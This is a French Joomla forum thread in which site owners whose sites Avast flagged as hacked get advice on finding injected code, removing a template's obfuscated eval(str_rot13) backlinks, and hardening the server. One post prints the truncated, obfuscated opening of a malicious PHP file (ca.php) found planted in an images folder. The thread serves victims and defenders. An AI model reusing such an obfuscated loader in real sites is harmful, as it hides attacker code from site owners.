Re : Site piraté, bloqué par AVAST

Bonjour,

Le site est bien piraté: http://sitecheck.sucuri.net/results/...clo-creusot.fr

La meilleure solution est évidemment de remettre une sauvegarde propre.
Sinon, il faut supprimer le code ajouté. Pour connaitre les fichiers modifiés on peut utiliser la méthode indiquée sur cette page : http://ralph.davidovits.net/internet...html#fichmodif

Re : Site piraté, bloqué par AVAST

Bonjour,

Le template étant malita, free, mais avec une vérole eval(str_rot13("le machin")) dans functions.php, il est à fuir comme la peste, la chaine en rot13 étant l'ouverture de liens externes, avec en danger potentiel, l'injection d en'importe quel JavaScript.

Re : Site piraté, bloqué par AVAST

Bonsoir,
J'ai sauvegardé la version en ligne, et j'ai passé tout cela à l'antivirus. C'est bien le fichier index.php du template qui est vérolé. J'ai dé-publié les lignes de code que j'ai trouvé comme mauvaises, le site fonctionne bien. J'ai ensuite supprimer ces mêmes lignes et repassé à l'antivirus qui me trouve mon fichier OK. Je le remplace sur le serveur : Plantage du template avec le message " The template will be break if the link is broken "
Il y a surement une autre ou des autres lignes à modifier, mais je ne sais pas lesquelles, pouvez vous m'aider, je peux vous envoyer le fichier en MP si vous voulez,
Merci de votre réponse !

Re : Site piraté, bloqué par AVAST

Enlever la vérole de ce template est une violation de ce qu eréclame son auteur.

La vraie solution est de changer de template.

Re : Site piraté, bloqué par AVAST

J'ai du mal à comprendre ...
J'ai remonté dans mes sauvegardes, et le fichier index est le même qu'aujourd'hui ! et Avast et les autres anti virus n'avaient rien détecté, ce template fonctionne depuis 18 mois sans pb ! Aujourd'hui seul Avast détecte ce pb, avez vous une idée de la raison, j'aimerais comprendre, par ailleurs si le template est vérolé, c'est d'origine et l'auteur est coupable ! Dans ce cas on doit pouvoir le modifier !! Adieu la propriété ! Enfin à mes yeux d’honnête homme ...
Bien sur le changement de template est la meilleure solution, c'est ce que je vais faire, mais cela représente du travail et du temps, j'aimerais avoir une solution transitoire ...

En tout cas merci de vos réponse,

Re : Site piraté, bloqué par AVAST

Les divers anti-virus/anti-malware se sont adaptés. Le code utilisé par ce template pour planquer ses liens utilise du eval(rot13, méthode d'encodage de pas mal de malwares, d'où la réaction de Avast.

Vérolé n'est pas le terme juste, disons que l'auteur planque ses backlinks en encodant une partie du template. Il n'est pas le seul, de nombreux templates Free utilisent cette technique, que nous réprouvons.

Re : Site piraté, bloqué par AVAST

Bonjour

ce sujet m'intéresse car notre site associatif a été piraté pour la 3° fois cette année par des ALgériens (https://www.facebook.com/Amazigh.Attackers).
Un utilisateur équipé d'AVAST m'avait indiqué que le site comportait un cheval de troie juste avant qu'il ne soit piraté.
J'avais tout remis à plat en début juillet en ré-installant J 3 et en changeant tous les login et mots de passe (ftp, admin, mysql).

Comment débusquer le code malveillant ?

Est-ce que cela peut-être dans la bdd ?

Seul le domaine principal est touché (www.avef.fr) les sous domaines jamais (ex dent.avef.fr)

Merci de votre aide

Amicalement votre

Re : Site piraté, bloqué par AVAST

Bonjour,
Débusquer le code malveillant est du coup par coup, il existe des milliers de cas de figure possibles, bien que la plupart des attaques se situent au niveau du index.php des templates.

Certains malwares exploitent également une faille de PHP permettant l'injection de code aléatoire.

Penser à protéger le répertoire /images et /media http://forum.joomla.org/viewtopic.php?f=621&t=773784

D'autres sites sont sur des serveurs ayant un système Debian, avec une faille (moins connue) de sa libc système, permettant d'exploiter un débordement de la pile d'appel sur la fonction realpath().

Penser à protéger ses sites, au niveau serveur, avec l'extension PHP Suhosin, qui protège bien de ces failles, et dans tous les cas, en mettant un .htaccess sur les répertoires fragiles.

Re : Site piraté, bloqué par AVAST

Et également, des outils genre CrawlProtect et CrawlTrack aident énormément.

Re : Site piraté, bloqué par AVAST

j'ai lu via le lien sus-cité, merci ! (http://ralph.davidovits.net/internet...html#fichmodif)

du coup en utilisant leur php fichmodif, j'ai trouvé un fichier ca.php (texte infra) qui a été ajouté dans les images à un moment où je n'étais pas en ligne ainsi que des mofif sur des fichiers dans les dossiers logs et cache de gantry

encore merci

le début du fichier ca.php :
[I]<?php if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC46CFE335260){$T059EC46CFE 335260=base64_decode($T059EC46CFE335260);$TC9A16C4 7DA8EEE87=0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E 4=0;$T65CE9F6823D588A7=(ord($T059EC46CFE335260[1])<<8)+ord($T059EC46CFE335260[2]);$TBF14159DC7D007D3=3;$T77605D5F26DD5248=0;$T4A74 7C3263CA7A55=16;$T7C7E72B89B83E235="";$T0D47BDF6FD 9DDE2E=strlen($T059EC46CFE335260);$T43D5686285035C 13=__FILE__;$T43D5686285035C13=file_get_contents($ T43D5686285035C13);$T6BBC58A3B5B11DC4=0;preg_match (base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"),$T4 3D5686285035C13,$T6BBC58A3B5B11DC4);for(;$TBF14159 DC7D007D3<$T0D47BDF6FD9DDE2E{if(count($T6BBC58A3B5B11DC4)) exit;if($T4A747C3263CA7A55==0){$T65CE9F6823D588A7= (ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$T65CE9F6823D588A7+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);$T4A747C3263CA7A55=16;}if($T65CE9F6823D588A7&0x8 000){$TC9A16C47DA8EEE87=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<4);$TC9A16C47DA8EEE87+=(ord($T059EC46CFE335260[$TBF14159DC7D007D3])>>4);if($TC9A16C47DA8EEE87){$TA7FB8B0A1C0E2E9E=(o rd($T059EC46CFE335260[$TBF14159DC7D007D3++])&0x0F)+3;for($T17D35BB9DF7A47E4=0;$T17D35BB9DF7A4 7E4<$TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++)$T7C7E 72B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4]=$T7C7E72B89B83E235[$T77605D5F26DD5248-$TC9A16C47DA8EEE87+$T17D35BB9DF7A47E4];$T77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E;}else{$TA7 FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$TA7FB8B0A1C0E2E9E+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++])+16;for($T17D35BB9DF7A47E4=0;$T17D35BB9DF7A47E4<$ TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4++]=$T059EC46CFE335260[$TBF14159DC7D007D3]);$TBF14159DC7D007D3++;$T77605D5F26DD5248+=$TA7FB8 B0A1C0E2E9E;}}else $T7C7E72B89B83E235[$T77605D5F26DD5248++]=$T059EC46CFE335260[$TBF14159DC7D007D3++];$T65CE9F6823D588A7<<=1;$T4A747C3263CA7A55--;if($TBF14159DC7D007D3==$T0D47BDF6FD9DDE2E){$T43D5 686285035C13=implode("",$T7C7E72B89B83E235);$T43D5 686285035C13="?".">".$T43D5686285035C13;return

Re : Site piraté, bloqué par AVAST

Là, tu as trouvé le fichier, mais pas comment il a été introduit.

Penses à installer une protection pro active de ton site, avec par exemple CrawlProtect.

Re : Site piraté, bloqué par AVAST

un premier pas !

je vais installer tout cela et sinon trouver un pro pour s'occuper de ce site,
l'associatif c'est bien mais chronophage quand il faut développer des compétences nouvelles !

sinon, il va falloir que je cotise à l'AFUJ pour soutenir ce beau forum, non ?

Re : Site piraté, bloqué par AVAST

Conserver la sécurité est non seulement chronopge, mais également de quoi passer tes soirées à lire tant les bugs Joomla! que les infos sécurité PHP, Apache, MySQL...
L'associatif, pour ces projets a des qualités et des défauts.
Qualités: s'investir dans un projet
Défauts: Ne pas avoir le budget pour tout ce qui est maintien de la présence web...

Re : Site piraté, bloqué par AVAST

Bonjour,

Je suis victime de la même attaque : eval(base64_decode(

J'ai crawlprotect et track d'installé.

Pourtant c'est la deuxième fois en 2 mois, alors qu'auparavant jamais de soucis.

Y a t il un moyen de savoir par où l'intégration du code se fait ?

Mes chmod sont à 705 sur les répertoires et 604 sur les fichiers, après l'infection.

Lorsque je regarde sur d'autres sites, ils sont à 755 et 644

Se peut il qu'il y ai une incidence ?

à bientôt

avanti